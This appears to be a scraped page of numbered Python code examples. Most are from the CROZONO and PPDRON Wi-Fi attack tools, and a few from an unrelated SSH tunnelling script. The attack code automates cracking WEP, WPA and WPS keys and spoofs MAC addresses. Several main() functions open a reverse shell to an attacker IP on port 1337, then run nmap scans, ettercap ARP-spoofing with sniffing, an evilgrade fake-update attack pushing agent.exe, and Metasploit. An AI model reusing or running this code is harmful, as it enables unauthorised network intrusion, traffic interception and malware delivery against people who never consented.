	if os.path.exists(OS_PATH + '/cr0z0n0_attack-01.csv'):
		os.remove(OS_PATH + '/cr0z0n0_attack-01.csv')
		os.remove(OS_PATH + '/cr0z0n0_attack-01.cap')
		os.remove(OS_PATH + '/cr0z0n0_attack-01.kismet.csv')
		os.remove(OS_PATH + '/cr0z0n0_attack-01.kismet.netxml')

	proc_airodump = subprocess.Popen(['airodump-ng', '--bssid', bssid, '-c', channel, '-w', 'cr0z0n0_attack', iface_mon],
						stdout=DN, stderr=DN)

	cmd_auth = pexpect.spawn('aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format(essid, bssid, new_mac, iface_mon))
	cmd_auth.logfile = open(LOG_FILE, 'wb')
	cmd_auth.expect(['Association successful', pexpect.TIMEOUT, pexpect.EOF], 20)
	cmd_auth.close()
	parse_log_auth = open(LOG_FILE, 'r')
	for line in parse_log_auth:
		if line.find('Association successful') != -1:
			info("Association successful")
	parse_log_auth.close()
	os.remove(LOG_FILE)

	proc_aireplay = Popen(['aireplay-ng', '-3', '-e', '"' + essid + '"', '-b', bssid, '-h', new_mac, iface_mon],
						stdout=DN, stderr=DN)

	time.sleep(WEP_AIREPLAY_TIME)

	cmd_crack = pexpect.spawn('aircrack-ng cr0z0n0_attack-01.cap')
	cmd_crack.logfile = open(LOG_FILE, 'wb')
	cmd_crack.expect(['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF], 30)
	cmd_crack.close()
	key_found = False
	parse_log_crack = open(LOG_FILE, 'r')
	for line in parse_log_crack:
		where = line.find('KEY FOUND!')
		if where > -1:
			if line.find('ASCII') != -1:
				where2 = line.find('ASCII')
				key_end = line.find(')')
				key_found = line[where2 + 6:key_end]
			else:
				key_end = line.find(']')
				key_found = line[where + 13:key_end]
	parse_log_crack.close()
	os.remove(LOG_FILE)

	return key_found
Example #20
0
def connect_with_password(host, user, password, ports):
    global session
    log.info('Connecting to {} using password'.format(host))
    cmd = 'ssh -L {ports} {usr}@{host}'.format(ports=' -L '.join(ports),
                                               usr=user,
                                               host=host)
    if session is None:
        session = pexpect.spawnu(cmd, encoding='UTF-8')
        set_up_logging()
    else:
        session.sendline(cmd)
    try:
        res = session.expect(get_expectations())
    except pexpect.TIMEOUT:
        # Ew, but I prefer to handle stuff below, all in the same place
        print('GOING THROUGH EXCEPT')
        res = 6
    if res == 0:
        session.waitnoecho()
        session.sendline(password)
    elif res == 1:
        if verify_logged_in():
            log.info('Password not needed')
            return session.pid
        else:
            res = 4
    elif res == 2:
        session.sendline('yes')
        session.expect(expectations.get('PASSWORD_REQUIRED'))
        log.info('Added Public Key for {} to known_hosts'.format(host))
        session.sendline(password)
    elif res == 3:
        log.error('Wrong password for {}! Aborting.'.format(host))
        exit(1)
    elif res == 4:
        log.error('Host {} is unreachable. Aborting.'.format(host))
        exit(1)
    res = session.expect(get_expectations(), timeout=10) if res in (0, 2) else 4
    if res in (1, 6):
        if verify_logged_in():
            log.info('Connected to {}'.format(host))
            return session.pid
        else:
            log.error('Error while connecting to {}. Aborting.'.format(host))
            exit(1)
    elif res == 3:
        # In case we had to add the PK to known_hosts
        log.error('Wrong password for host {}! Aborting.'.format(host))
        exit(1)
    else:
        log.error('Error while connecting to {}. Aborting.'.format(host))
        log.error('Either run with logging activated, or SSH manually!')
        exit(1)
Example #21
0
def connect_with_key(host, user, key, ports):
    global session
    log.info('Connecting to {} using key'.format(host))
    cmd = 'ssh -L {ports} -i {key} {usr}@{host}'.format(ports=' -L '.join(ports),
                                                        key=key.replace('~', os.path.expanduser('~')),
                                                        usr=user,
                                                        host=host)
    if session is None:
        session = pexpect.spawnu(cmd, encoding='UTF-8')
        set_up_logging()
    else:
        session.sendline(cmd)
    try:
        res = session.expect(get_expectations())
    except pexpect.TIMEOUT:
        # Ew, but I prefer to handle stuff below, all in the same place
        res = 5
    if res == 0:
        log.error('Got asked for a password when logging with key to {}. Cowardly aborting.'.format(host))
        exit(1)
    elif res == 1:
        log.info('Connected to {}'.format(host))
        return session.pid
    elif res == 2:
        session.sendline('yes')
    elif res == 3:
        log.error('Access denied for {} with key {}! Aborting.'.format(host, key))
        exit(1)
    elif res == 4 or res == 5:
        log.error('Host {} is unreachable. Aborting.'.format(host))
        exit(1)
    res = session.expect(get_expectations())
    if res == 1:
        log.info('Connected to {}'.format(host))
        return session.pid
    else:
        log.error('Error while connecting to {}. Aborting.'.format(host))
        log.error('Either run with logging activated, or SSH manually!')
        exit(1)
Example #22
0
def main():
	banner()

	if not checks.check_root():
		error('You need root privileges to run CROZONO!\n')
		exit(1)

	if not checks.check_wlan_attacks_dependencies():
		exit(1)

	args = parse_args()

	info("CROZONO running...")
	settings.OS_PATH = os.getcwd()
	settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
	settings.INTERFACE = device_mgr.get_ifaces()[0] if settings.INTERFACE is None else settings.INTERFACE
	settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
	settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
	settings.IP_ATTACKER = args.dest if args.dest is not None else settings.IP_ATTACKER
	settings.ATTACK = args.attack if args.attack is not None else settings.ATTACK


	if settings.TARGET_ESSID is not None:
		if settings.TARGET_KEY is not None:
			ap_target = None
			lan_mgr.connect_to_lan()
		else:
			device_mgr.hardware_setup()
			ap_target = airodump.scan_targets()
	else:
		device_mgr.hardware_setup()
		ap_target = airodump.scan_targets()

	# -------------------- Infiltrate wifi --------------------
	if ap_target is not None:
		settings.TARGET_ESSID = ap_target.get('ESSID').strip()
		settings.TARGET_BSSID = ap_target.get('BSSID').strip()
		settings.TARGET_CHANNEL = ap_target.get('channel').strip()
		settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()

		info("Target selected: " + settings.TARGET_ESSID)

		if settings.TARGET_PRIVACY == 'WEP':
			from src.attacks import wep_attack
			info("Cracking {e} access point with WEP privacy...".format(e=settings.TARGET_ESSID))
			wep_attack.run()
			if settings.TARGET_KEY is None:
				error("Key not found! :(")
				exit()
			else:
				info("Key found!: {k} ".format(k=settings.TARGET_KEY))
				lan_mgr.save_key()
				lan_mgr.connect_to_lan()

		elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2 WPA':
			from src.attacks import wpa_attack,wps_attack
			info("Cracking {e} access point with {p} privacy...".format(e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))

			wps = wps_attack.check()

			if wps:
				info("WPS is enabled")
				wps_attack.pixiedust()
				if settings.TARGET_KEY is None:
					warn("PIN not found! Trying with conventional WPA attack...")
					wpa_attack.run()
			else:
				warn("WPS is not enabled")
				wpa_attack.run()

			if settings.TARGET_KEY is None:
				error("Key not found! :(")
				exit(1)
			else:
				info("Key found!: {k} ".format(k=settings.TARGET_KEY))
				lan_mgr.save_key()
				lan_mgr.connect_to_lan()
		else:
			info("Open network!")
			lan_mgr.connect_to_lan()

	# -------------------- Acquired LAN range -----------------------------------------

	lan_mgr.lan_range()
	lan_mgr.get_gateway()

	# -------------------- Connect to attacker and relay NMap info --------------------

	if os.path.exists(settings.OS_PATH + '/cr0z0n0_nmap'):
		os.remove(settings.OS_PATH + '/cr0z0n0_nmap')

	if not checks.check_lan_attacks_dependencies():
		exit(1)

	if settings.IP_ATTACKER is not None:
		info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=settings.IP_ATTACKER))
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((settings.IP_ATTACKER, settings.PORT_ATTACKER))
		os.dup2(s.fileno(), 0)
		os.dup2(s.fileno(), 1)
		os.dup2(s.fileno(), 2)
		banner()
		info("Hello! :)")
		info("Executing Nmap...")
		subprocess.call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', settings.IP_LAN, settings.LAN_RANGE], stderr=subprocess.DEVNULL)
	else:
		warn("Attacker not defined! Ending up...")
		exit()

	# -------------------- Attacks --------------------

	if settings.ATTACK == 'sniffing-mitm':
		from src.attacks import sniffing_mitm
		sniffing_mitm.run()

	elif settings.ATTACK == 'metasploit':
		from src.attacks import metasploit
		metasploit.run()
	else:
		warn("Attack not defined!")

	s.shutdown(1)

	info("CROZONO has finished! Good bye! ;)")
Example #23
0
 def run(self):
     info("Running Metasploit...")
     proc = subprocess.call(["msfconsole"], stderr=subprocess.DEVNULL)
Example #24
0
def main():
	banner()
	if not check_root():
		error('You need root privileges to run CROZONO!\n')
		exit(1)
	if not check_wlan_attacks_dependences():
		exit(1)

	info("CROZONO running...")

	args = parse_args()

	if args.essid is not None:
		if args.key is not None:
			ap_target = False
			ip_lan = connect(args.essid, args.key)
		else:
			iface_mon = hardware_setup()
			new_mac = mac_changer(iface_mon)
			ap_target = scan_targets(iface_mon, args.essid)
	else:
		iface_mon = hardware_setup()
		new_mac = mac_changer(iface_mon)
		ap_target = scan_targets(iface_mon)

	# -------------------- Infiltrate wifi --------------------
	if ap_target:
		target_essid = ap_target.get('ESSID').strip()
		target_bssid = ap_target.get('BSSID').strip()
		target_channel = ap_target.get('channel').strip()
		target_privacy = ap_target.get('Privacy').strip()

		info("Target selected: " + target_essid)

		if target_privacy == 'WEP':
			info("Cracking {e} access point with WEP privacy...".format(e=target_essid))
			key = wep_attack(target_essid, target_bssid, target_channel, new_mac, iface_mon)
			if not key:
				error("Key not found! :(")
				exit()
			else:
				info("Key found!: {k} ".format(k=key))
				save_key(target_essid, key)
				ip_lan = connect(target_essid, key, iface_mon)

		elif target_privacy == 'WPA' or target_privacy == 'WPA2' or target_privacy == 'WPA2 WPA':
			info("Cracking {e} access point with {p} privacy...".format(e=target_essid, p=target_privacy))

			wps = wps_check(target_bssid, iface_mon)

			if wps:
				info("WPS is enabled")
				key = wpa_with_wps_attack(target_bssid, target_channel, iface_mon)
				if not key:
					warn("PIN not found! Trying with conventional WPA attack...")
					key = wpa_attack(target_bssid, target_channel, iface_mon)
			else:
				warn("WPS is not enabled")
				key = wpa_attack(target_bssid, target_channel, iface_mon)

			if not key:
				error("Key not found! :(")
				exit()
			else:
				info("Key found!: {k} ".format(k=key))
				save_key(target_essid, key)
				ip_lan = connect(target_essid, key, iface_mon)
		else:
			info("Open network!")
			ip_lan = connect(target_essid, None, iface_mon)

	# -------------------- Acquired LAN range --------------------

	ip_lan = ip_lan.strip()
	net = ip_lan.split('.')
	range_net = net[0] + '.' + net[1] + '.' + net[2] + '.1-255'

	# -------------------- Connect to attacker and relay nmap info --------------------

	if os.path.exists(OS_PATH + '/cr0z0n0_nmap'):
		os.remove(OS_PATH + '/cr0z0n0_nmap')

	if not check_lan_attacks_dependences():
		exit(1)

	attacker = args.dest

	if attacker is not None:
		info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=attacker))
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((attacker, 1337))
		os.dup2(s.fileno(), 0)
		os.dup2(s.fileno(), 1)
		os.dup2(s.fileno(), 2)
		banner()
		info("Hello! :)")
		info("Executing Nmap...")
		call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', ip_lan, range_net], stderr=DN)
	else:
		warn("Attacker not defined! Ending...")
		exit()

	# -------------------- Attacks --------------------

	attack = args.attack

	if attack == 'sniffing-mitm':
		iface = get_ifaces()[0]
		gateway = get_gateway().strip()
		target_mitm = get_target_mitm(gateway, ip_lan)
		info("Executing MITM and Sniffing attacks between {g} and {m}...".format(g=gateway, m=target_mitm))
		cmd_ettercap = pexpect.spawn(
				'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(g=gateway, m=target_mitm, i=iface))
		time.sleep(2)
		# cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=iface))
		proc = subprocess.call(["tshark", "-i", iface], stderr=DN)

	elif attack == 'evilgrade':
		modules = open(OS_PATH + '/evilgrade/modules.txt', 'r')
		agent = OS_PATH + '/evilgrade/agent.exe'
		for line in modules:
			print(line.replace('\n', ''))
		print("\n\n Select module to use: ")
		plugin = input()
		info("Thank you! Evilgrade will be executed!")
		s.shutdown(1)

		if os.path.exists('/etc/ettercap/etter.dns'):
			call(['rm', '/etc/ettercap/etter.dns'])
		etter_template = open(OS_PATH + '/evilgrade/etter.dns.template', 'r')
		etter_dns = open(OS_PATH + '/evilgrade/etter.dns', 'w')
		for line in etter_template:
			line = line.replace('IP', ip_lan)
			etter_dns.write(line)
		etter_dns.close()
		etter_template.close()
		call(['mv', './evilgrade/etter.dns', '/etc/ettercap/etter.dns'])

		evilgrade = pexpect.spawn('evilgrade')
		evilgrade.expect('evilgrade>')
		evilgrade.sendline('configure ' + plugin)
		evilgrade.sendline('set agent ' + agent)
		evilgrade.sendline('start')
		time.sleep(1)

		iface = get_ifaces()[0]
		gateway = get_gateway().strip()
		target_mitm = get_target_mitm(gateway, ip_lan)
		cmd_ettercap = pexpect.spawn(
				'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i} -P dns_spoof'.format(g=gateway, m=target_mitm, i=iface))
		time.sleep(EVILGRADE_ATTACK_TIME)

	elif attack == 'metasploit':
		info("Executing Metasploit...")
		proc = subprocess.call(["msfconsole"], stderr=DN)
	else:
		warn("Attack not defined!")

	s.shutdown(1)

	info("CROZONO has finished! Good bye! ;)")
Example #25
0
def hardware_setup():
	info("Setting interface to monitor mode")
	iface = get_ifaces()[0]
	iface_mon = toggle_mode_monitor(iface, True)
	return iface_mon
Example #26
0
def main():
    banner()

    if not checks.check_root():
        error('You need root privileges to run CROZONO!\n')
        exit(1)

    if not checks.check_wlan_tools_dependencies():
        exit(1)

    args = parse_args()

    settings.OS_PATH = os.getcwd()
    settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
    settings.INTERFACE = device_mgr.get_ifaces(
    )[0] if settings.INTERFACE is None else settings.INTERFACE
    settings.DELAY = args.delay if args.delay is not None else settings.DELAY
    settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
    settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
    settings.IP_ATTACKER = args.connect if args.connect is not None else settings.IP_ATTACKER
    settings.LAN_DISCOVERY = args.discovery if args.discovery is not None else settings.LAN_DISCOVERY
    settings.ATTACK = args.attack if args.attack is not None else settings.ATTACK

    delay = float(settings.DELAY) * 60
    time.sleep(delay)
    info("CROZONO running...")

    if settings.TARGET_ESSID is not None:
        if settings.TARGET_KEY is not None:
            ap_target = None
            lan_mgr.connect_to_lan()
        else:
            device_mgr.hardware_setup()
            ap_target = airodump.scan_targets()
    else:
        device_mgr.hardware_setup()
        ap_target = airodump.scan_targets()

    # -------------------- Infiltrate wifi ------------------------------------------------
    if ap_target is not None:
        settings.TARGET_ESSID = ap_target.get('ESSID').strip()
        settings.TARGET_BSSID = ap_target.get('BSSID').strip()
        settings.TARGET_CHANNEL = ap_target.get('channel').strip()
        settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()

        info("Target selected: " + settings.TARGET_ESSID)

        if settings.TARGET_PRIVACY == 'WEP':
            info("Cracking {e} access point with WEP privacy...".format(
                e=settings.TARGET_ESSID))
            wep_modules = find_modules('wep')
            for wep_module in wep_modules:
                attack = import_module(wep_module[0])
                if attack.check():
                    attack.setup()
                    attack.run()
                    if settings.TARGET_KEY is not None:
                        info("Key found!: {k} ".format(k=settings.TARGET_KEY))
                        lan_mgr.save_key()
                        lan_mgr.connect_to_lan()
                        break
                else:
                    pass
            if settings.TARGET_KEY is None:
                error("Key not found! :-(")
                exit(0)

        elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2 WPA':
            info("Cracking {e} access point with {p} privacy...".format(
                e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))

            wps = wash.wash_scan()

            if wps:
                info("WPS is enabled")
                wps_modules = find_modules('wps')
                for wps_module in wps_modules:
                    attack = import_module(wps_module[0])
                    if attack.check():
                        attack.setup()
                        attack.run()
                        if settings.TARGET_KEY is not None:
                            info("Key found!: {k} ".format(
                                k=settings.TARGET_KEY))
                            break
                    else:
                        pass

            if settings.TARGET_KEY is None:
                if wps:
                    warn(
                        "PIN not found! :-( Running WPA/WPA2 attack modules..."
                    )
                wpa_modules = find_modules('wpa')
                for wpa_module in wpa_modules:
                    attack = import_module(wpa_module[0])
                    if attack.check():
                        attack.setup()
                        attack.run()
                        if settings.TARGET_KEY is not None:
                            info("Key found!: {k} ".format(
                                k=settings.TARGET_KEY))
                            break
                    else:
                        pass

            if settings.TARGET_KEY is None:  # still...
                error("Key not found! :-(")
                exit(0)
            else:
                lan_mgr.save_key()
                lan_mgr.connect_to_lan()
        else:
            info("Open network!")
            lan_mgr.connect_to_lan()

    # -------------------- Acquired LAN range --------------------------------------------

    lan_mgr.lan_range()
    lan_mgr.get_gateway()

    # -------------------- Connect to attacker and relay network info --------------------

    if settings.IP_ATTACKER is not None:
        info(
            "Sending information about network to attacker ({ip}) and running attacks..."
            .format(ip=settings.IP_ATTACKER))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((settings.IP_ATTACKER, settings.PORT_ATTACKER))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        banner()
        info("Hello! :)")

        if settings.LAN_DISCOVERY is not None:
            discovery = import_module(settings.LAN_DISCOVERY)
            if discovery.check():
                discovery.setup()
                discovery.run()
            else:
                warn("Error to run LAN discovery module!")
    else:
        warn("Attacker not defined! Ending...")
        exit(0)

    # -------------------- LAN Attacks --------------------------------------------------

    if settings.ATTACK is not None:
        attack = import_module(settings.ATTACK)
        if attack.check():
            attack.setup()
            attack.run()
        else:
            error("Error to run LAN attack module! Ending...")
            exit(1)
    else:
        warn("Attack not defined!")

    s.shutdown(1)

    info("CROZONO has finished! Good bye! ;)")
Example #27
0
def hardware_setup():
	info("Setting interface to monitor mode")
	toggle_mode_monitor(True)
	mac_changer()
Example #28
0
def hardware_setup():
    info("Setting interface to monitor mode")
    toggle_mode_monitor(True)
    mac_changer()
Example #29
0
def main():
    global session
    global logging
    global disconnection_timeout

    c = args.config
    log.info('Using: {}'.format(os.path.join(os.path.dirname(os.path.abspath(c)), c)))
    with open(c) as f:
        config = yaml.load(f)
        logging = config.get('logging')
    tunnels = config.get('tunnels')
    all_tunnels = []
    [all_tunnels.append(Tunnel(t)) for t in tunnels]
    hops = config.get('hops')
    for i, hop in enumerate(hops):
        pid_stack = []
        key = list(hop.keys())[0]
        h = hop[key]
        hop = Hop(key, h, i)
        tunnels = []
        if hop.key_auth:
            if hop.index == len(hops) - 1:
                [tunnels.append(each.mapping) for each in all_tunnels]
            else:
                for tun in all_tunnels:
                    tunnels.append(tun.get_localhost_mapping())
            p = connect_with_key(hop.host, hop.user, hop.auth, tunnels)
            pid_stack.append(p)
        else:
            if hop.index == len(hops) - 1:
                [tunnels.append(each.mapping) for each in all_tunnels]
            else:
                for tun in all_tunnels:
                    tunnels.append(tun.get_localhost_mapping())
            p = connect_with_password(hop.host, hop.user, hop.auth, tunnels)
            pid_stack.append(p)

    session.sendline('while [ 1=1 ]; do echo \'keepalive\' ; sleep 3 ; done')
    log.info('Tunneling done:')
    [log.info(t) for t in all_tunnels]

    # TODO: Watch for broken pipe?
    try:
        input("Press ENTER to disconnect")
        print()
    except KeyboardInterrupt:
        log.error('Getting out of here!')
        disconnection_timeout = 0
    for h in reversed(hops):
        alias = list(h.keys())[0]
        log.info("Disconnecting from {}".format(alias))
        try:
            r = logout(disconnection_timeout)
        except KeyboardInterrupt:
            log.warn("Hurrying up.")
            r = None
            disconnection_timeout = 0
        if r:
            log.info('Disconnected')
        else:
            log.warn('Connection forcefully closed')
    try:
        os.kill(pid_stack[0], signal.SIGKILL)
        log.warn('Killed off remaining SSH process')
    except ProcessLookupError:
        pass
    log.info('Done')
Example #30
0
def connect(essid, key, iface_mon=None):
    import fcntl
    import struct
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    tries = 0

    iface = get_ifaces()[0]

    def do_connect():
        nonlocal sock
        nonlocal tries
        info("Connecting to '{0}' with key '{1}'".format(
            essid, key if key is not None else ''))
        if iface_mon is not None:
            call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN)
            time.sleep(1)  # TODO: Necessary? - yep for Raspbian.

        cmd_connect = pexpect.spawn(
            'iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
        cmd_connect.logfile = open(LOG_FILE, 'wb')
        cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
        cmd_connect.close()
        parse_log_connect = open(LOG_FILE, 'r')
        for line in parse_log_connect:
            if line.find('Error') != -1:
                wpa_supplicant = open(
                    '/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
                wpa_supplicant.write(
                    'ctrl_interface=/var/run/wpa_supplicant\n')
                wpa_supplicant.write('network={\n')
                wpa_supplicant.write('ssid="' + essid + '"\n')
                wpa_supplicant.write(
                    'key_mgmt=WPA-PSK\n'
                )  # TODO: Always wpa-psk? - No problem yet.
                wpa_supplicant.write('psk="' + key.strip() + '"\n')
                wpa_supplicant.write('}')
                wpa_supplicant.close()
                call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
                call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
                call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
                call(['iwconfig', iface, 'mode', 'managed'])
                call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
                call([
                    'wpa_supplicant', '-B', '-c',
                    '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface
                ],
                     stdout=DN,
                     stderr=DN)
                time.sleep(2)
        parse_log_connect.close()
        os.remove(LOG_FILE)
        tries += 1
        call(['dhclient', iface], stdout=DN, stderr=DN)
        time.sleep(4)

    do_connect()
    if get_current_essid(iface) != essid and tries < 5:
        warn('Connection to {e} failed. Retrying.'.format(e=essid))
        do_connect()
    if get_current_essid(iface) == essid:
        ipaddr = socket.inet_ntoa(
            fcntl.ioctl(sock.fileno(), 0x8915,
                        struct.pack('256s', bytes(iface[:15],
                                                  'utf-8')))[20:24])
        info('Connection to {e} succeeded! Our IP is: {i}'.format(e=essid,
                                                                  i=ipaddr))
        return ipaddr
    else:
        error(
            'Could not connect to {e} after 5 tries. Aborting'.format(e=essid))
        exit(1)
Example #31
0
def main():
    banner()
    if not check_root():
        error('You need root privileges to run CROZONO!\n')
        exit(1)
    if not check_wlan_attacks_dependences():
        exit(1)

    info("CROZONO running...")

    args = parse_args()

    if args.essid is not None:
        if args.key is not None:
            ap_target = False
            ip_lan = connect(args.essid, args.key)
        else:
            iface_mon = hardware_setup()
            new_mac = mac_changer(iface_mon)
            ap_target = scan_targets(iface_mon, args.essid)
    else:
        iface_mon = hardware_setup()
        new_mac = mac_changer(iface_mon)
        ap_target = scan_targets(iface_mon)

    # -------------------- Infiltrate wifi --------------------
    if ap_target != False:
        target_essid = ap_target.get('ESSID').strip()
        target_bssid = ap_target.get('BSSID').strip()
        target_channel = ap_target.get('channel').strip()
        target_privacy = ap_target.get('Privacy').strip()

        info("Target selected: " + target_essid)

        if target_privacy == 'WEP':
            info("Cracking {e} access point with WEP privacy...".format(
                e=target_essid))
            key = WEP_attack(target_essid, target_bssid, target_channel,
                             new_mac, iface_mon)
            if key == False:
                error("Key not found! :(")
                exit()
            else:
                info("Key found!: {k} ".format(k=key))
                save_key(target_essid, key)
                ip_lan = connect(target_essid, key, iface_mon)

        elif target_privacy == 'WPA' or target_privacy == 'WPA2' or target_privacy == 'WPA2 WPA':
            info("Cracking {e} access point with {p} privacy...".format(
                e=target_essid, p=target_privacy))

            WPS = WPS_check(target_bssid, iface_mon)

            if WPS == True:
                info("WPS is enabled")
                key = WPA_with_WPS_attack(target_bssid, target_channel,
                                          iface_mon)
                if key == False:
                    warn(
                        "PIN not found! Trying with conventional WPA attack..."
                    )
                    key = WPA_attack(target_bssid, target_channel, iface_mon)
            else:
                warn("WPS is not enabled")
                key = WPA_attack(target_bssid, target_channel, iface_mon)

            if key == False:
                error("Key not found! :(")
                exit()
            else:
                info("Key found!: {k} ".format(k=key))
                save_key(target_essid, key)
                ip_lan = connect(target_essid, key, iface_mon)
        else:
            info("Open network!")
            ip_lan = connect(target_essid, None, iface_mon)

    # -------------------- Acquired LAN range --------------------

    ip_lan = ip_lan.strip()
    net = ip_lan.split('.')
    range_net = net[0] + '.' + net[1] + '.' + net[2] + '.1-255'

    # -------------------- Connect to attacker and relay nmap info --------------------

    if os.path.exists(OS_PATH + '/cr0z0n0_nmap'):
        os.remove(OS_PATH + '/cr0z0n0_nmap')

    if not check_lan_attacks_dependences():
        exit(1)

    attacker = args.dest

    if attacker is not None:
        info(
            "Sending information about network to attacker ({ip}) and running attacks..."
            .format(ip=attacker))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((attacker, 1337))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        banner()
        info("Hello! :)")
        info("Executing Nmap...")
        call([
            'nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', ip_lan,
            range_net
        ],
             stderr=DN)
    else:
        warn("Attacker not defined! Ending...")
        exit()

    # -------------------- Attacks --------------------

    attack = args.attack

    if attack == 'sniffing-mitm':
        iface = get_ifaces()[0]
        gateway = get_gateway().strip()
        target_mitm = get_target_mitm(gateway, ip_lan)
        info("Executing MITM and Sniffing attacks between {g} and {m}...".
             format(g=gateway, m=target_mitm))
        cmd_ettercap = pexpect.spawn(
            'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(
                g=gateway, m=target_mitm, i=iface))
        time.sleep(2)
        #cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=iface))
        proc = subprocess.call(["tshark", "-i", iface], stderr=DN)

    elif attack == 'evilgrade':
        modules = open(OS_PATH + '/evilgrade/modules.txt', 'r')
        agent = OS_PATH + '/evilgrade/agent.exe'
        for line in modules:
            print(line.replace('\n', ''))
        print("\n\n Select module to use: ")
        plugin = raw_input()
        info("Thank you! Evilgrade will be executed!")
        s.shutdown(1)

        if os.path.exists('/etc/ettercap/etter.dns'):
            call(['rm', '/etc/ettercap/etter.dns'])
        etter_template = open(OS_PATH + '/evilgrade/etter.dns.template', 'r')
        etter_dns = open(OS_PATH + '/evilgrade/etter.dns', 'w')
        for line in etter_template:
            line = line.replace('IP', ip_lan)
            etter_dns.write(line)
        etter_dns.close()
        etter_template.close()
        call(['mv', './evilgrade/etter.dns', '/etc/ettercap/etter.dns'])

        evilgrade = pexpect.spawn('evilgrade')
        evilgrade.expect('evilgrade>')
        evilgrade.sendline('configure ' + plugin)
        evilgrade.sendline('set agent ' + agent)
        evilgrade.sendline('start')
        time.sleep(1)

        iface = get_ifaces()[0]
        gateway = get_gateway().strip()
        target_mitm = get_target_mitm(gateway, ip_lan)
        cmd_ettercap = pexpect.spawn(
            'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i} -P dns_spoof'.format(
                g=gateway, m=target_mitm, i=iface))
        time.sleep(EVILGRADE_ATTACK_TIME)

    elif attack == 'metasploit':
        info("Executing Metasploit...")
        proc = subprocess.call(["msfconsole"], stderr=DN)
    else:
        warn("Attack not defined!")

    s.shutdown(1)

    info("CROZONO has finished! Good bye! ;)")
Example #32
0
def hardware_setup():
    info("Setting interface to monitor mode")
    iface = get_ifaces()[0]
    iface_mon = toggle_mode_monitor(iface, True)
    return iface_mon
Example #33
0
def main():
    banner()
    report.initLog()
    report.initReport()

    if not checks.check_root():
        error('You need root privileges to run PPDRON!\n')
        report.saveLog('You need root privileges to run PPDRON!\n')
        generateReport()
        exit(1)

    if not checks.check_wlan_tools_dependencies():
        generateReport()
        exit(1)

    args = parse_args()

    settings.OS_PATH = os.getcwd()
    settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
    settings.INTERFACE = device_mgr.get_ifaces(
    )[0] if settings.INTERFACE is None else settings.INTERFACE
    settings.DELAY = args.delay if args.delay is not None else settings.DELAY
    settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
    settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY

    delay = float(settings.DELAY) * 60
    time.sleep(delay)
    report.saveLog('PPDRON running...')
    info('PPDRON running...')

    if settings.TARGET_ESSID is not None:
        if settings.TARGET_KEY is not None:
            ap_target = None
        else:
            device_mgr.hardware_setup()
            ap_target = airodump.scan_targets()
    else:
        device_mgr.hardware_setup()
        ap_target = airodump.scan_targets()

    # -------------------- Infiltrate wifi ------------------------------------------------
    if ap_target is not None:
        settings.TARGET_ESSID = ap_target.get('ESSID').strip()
        settings.TARGET_BSSID = ap_target.get('BSSID').strip()
        settings.TARGET_CHANNEL = ap_target.get('channel').strip()
        settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()

        info('Target selected: ' + settings.TARGET_ESSID + ' Channel: ' +
             settings.TARGET_CHANNEL + ' Privacy: ' + settings.TARGET_PRIVACY)
        report.saveLog('Target selected: ' + settings.TARGET_ESSID +
                       ' Channel: ' + settings.TARGET_CHANNEL + ' Privacy: ' +
                       settings.TARGET_PRIVACY)

        if settings.TARGET_PRIVACY == 'WEP':
            report.TARGET_ATTACK = 'Fuerza bruta'
            info('Cracking {e} access point with WEP privacy...'.format(
                e=settings.TARGET_ESSID))
            report.saveLog(
                'Cracking {e} access point with WEP privacy...'.format(
                    e=settings.TARGET_ESSID))
            wep_modules = find_modules('wep')
            for wep_module in wep_modules:
                attack = import_module(wep_module[0])
                if attack.check():
                    attack.setup()
                    attack.run()
